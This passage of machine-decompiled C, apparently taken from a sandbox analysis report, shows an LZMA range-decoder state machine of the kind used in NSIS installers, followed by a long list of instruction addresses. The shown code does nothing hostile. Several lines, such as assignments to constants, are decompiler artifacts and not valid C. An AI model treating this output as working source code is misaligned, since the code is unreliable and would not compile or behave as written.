									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                              0x00406bc0
                                                              0x00406bc7
                                                              0x00406bcd
                                                              0x00406bd3
                                                              0x00000000
                                                              0x00406bd7
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bf9
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c0e
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c59
                                                              0x00406c5c
                                                              0x00406c84
                                                              0x00406c84
                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c5e
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c76
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406ccd
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd2
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cef
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d35
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073dd
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x00407413
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040741c
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x00000000
                                                              0x004075cf
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743b
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00407441
                                                              0x00407441
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d61
                                                              0x00406d64
                                                              0x00406dd5
                                                              0x00406dd8
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x00000000
                                                              0x00406dec
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d6d
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d87
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406d9c
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406dac
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00000000
                                                              0x00406dcf
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406db7
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407020
                                                              0x00407023
                                                              0x0040702a
                                                              0x0040702d
                                                              0x00407030
                                                              0x00407033
                                                              0x00407036
                                                              0x00407039
                                                              0x0040703b
                                                              0x00407042
                                                              0x00407043
                                                              0x00407045
                                                              0x00407048
                                                              0x0040704b
                                                              0x0040704e
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407053
                                                              0x00407004
                                                              0x00407007
                                                              0x0040700a
                                                              0x00407014
                                                              0x00000000
                                                              0x00000000
                                                              0x00407068
                                                              0x0040706c
                                                              0x0040708f
                                                              0x00407092
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x0040706e
                                                              0x00407071
                                                              0x00407074
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x00407087
                                                              0x00000000
                                                              0x00000000
                                                              0x004070ab
                                                              0x004070af
                                                              0x00000000
                                                              0x00000000
                                                              0x004070b5
                                                              0x004070b9
                                                              0x00000000
                                                              0x00000000
                                                              0x004070bf
                                                              0x004070c1
                                                              0x004070c5
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x00000000
                                                              0x00000000
                                                              0x0040711c
                                                              0x00407120
                                                              0x00407127
                                                              0x0040712a
                                                              0x0040712d
                                                              0x00407137
                                                              0x00000000
                                                              0x00407137
                                                              0x00407122
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x0040715d
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00407166
                                                              0x00407166
                                                              0x00407169
                                                              0x00407170
                                                              0x00407175
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00406df8
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x00000000
                                                              0x00407569
